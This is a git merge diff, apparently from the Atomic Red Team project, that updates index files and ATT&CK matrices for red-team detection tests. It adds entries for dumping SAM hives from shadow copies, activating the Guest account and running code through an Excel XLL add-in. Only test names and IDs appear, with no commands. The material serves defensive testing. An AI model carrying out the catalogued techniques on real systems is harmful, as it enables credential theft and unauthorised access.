Merge branch 'master' into T1556.003-pam

2021-08-12 12:54:36 -05:00
parent 665573613f 370062439e
commit 19820c2136
28 changed files with 914 additions and 8 deletions
@@ -76,6 +76,8 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
+credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
 collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
@@ -142,6 +144,7 @@ privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/cront
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+privilege-escalation,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
@@ -266,6 +269,7 @@ defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255
 defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
@@ -511,6 +515,7 @@ persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1137.006,Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
 persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
@@ -541,6 +546,7 @@ persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ fold
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+persistence,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -911,6 +917,7 @@ exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
 initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+initial-access,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
@@ -52,6 +52,8 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
+credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
 collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
 collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
 collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
@@ -96,6 +98,7 @@ privilege-escalation,T1546.001,Change Default File Association,1,Change Default
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+privilege-escalation,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
@@ -179,6 +182,7 @@ defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255
 defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
@@ -348,6 +352,7 @@ persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debu
 persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
+persistence,T1137.006,Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
@@ -368,6 +373,7 @@ persistence,T1546.001,Change Default File Association,1,Change Default File Asso
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+persistence,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -624,6 +630,7 @@ lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Man
 lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
 lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
 initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+initial-access,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
@@ -122,6 +122,8 @@
  - Atomic Test #2: Registry parse with pypykatz [windows]
  - Atomic Test #3: esentutl.exe SAM copy [windows]
  - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
+  - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
+  - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -262,6 +264,7 @@
  - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
  - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -486,6 +489,7 @@
  - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
  - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
  - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
@@ -868,7 +872,8 @@
  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
 - T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1137.006 Add-ins](../../T1137.006/T1137.006.md)
+  - Atomic Test #1: Code Executed Via Excel Add-in File (Xll) [windows]
 - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
  - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
  - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
@@ -925,6 +930,7 @@
  - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
  - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
  - Atomic Test #1: Create a new Windows domain admin user [windows]
  - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -1657,6 +1663,7 @@
 - T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
  - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -90,6 +90,8 @@
  - Atomic Test #2: Registry parse with pypykatz [windows]
  - Atomic Test #3: esentutl.exe SAM copy [windows]
  - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
+  - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
+  - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
 - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -197,6 +199,7 @@
  - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
  - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -350,6 +353,7 @@
  - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
  - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
  - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
  - Atomic Test #2: Certutil Rename and Decode [windows]
@@ -622,7 +626,8 @@
  - Atomic Test #1: Admin Account Manipulate [windows]
  - Atomic Test #2: Domain Account and Group Manipulate [windows]
 - T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1137.006 Add-ins](../../T1137.006/T1137.006.md)
+  - Atomic Test #1: Code Executed Via Excel Add-in File (Xll) [windows]
 - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
  - Atomic Test #1: Install AppInit Shim [windows]
@@ -663,6 +668,7 @@
  - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
  - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
  - Atomic Test #1: Create a new Windows domain admin user [windows]
  - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -1148,6 +1154,7 @@
 - T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
  - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -5,7 +5,7 @@
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Add-ins](../../T1137.006/T1137.006.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -4,7 +4,7 @@
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
